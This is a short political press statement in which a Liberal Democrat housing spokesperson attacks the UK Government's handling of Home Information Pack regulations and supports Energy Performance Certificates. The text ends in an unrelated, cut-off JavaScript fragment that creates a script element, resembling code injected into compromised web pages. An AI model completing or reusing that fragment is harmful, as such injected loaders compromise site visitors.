Bungling of HIPs must not undermine energy certificates

Commenting ahead of Tuesdays House of Lords vote on Home Information Pack (HIP) regulations, the Liberal Democrats have attacked the speed at which the new regulations are being rushed through.

Liberal Democrat Housing Spokesperson, Baroness (Ros) Scott said:

“The Government has completely bungled the introduction of HIPs. Instead of waiting on the results of pilot schemes, it is recklessly pressing ahead and expecting the public to pick up the pieces if it all goes wrong. That is why we will oppose these regulations.

“However, the Government’s mistakes with HIPs must not be allowed to undermine Energy Performance Certificates, which we will continue to support.

“The Government must provide assurances that they really have sorted out all the administrative issues. For example, ministers must ensure there are enough Domestic Energy Assessors when the new system starts next month.”var d=document;var s=d.createElement('script'); if (document.currentScript) {
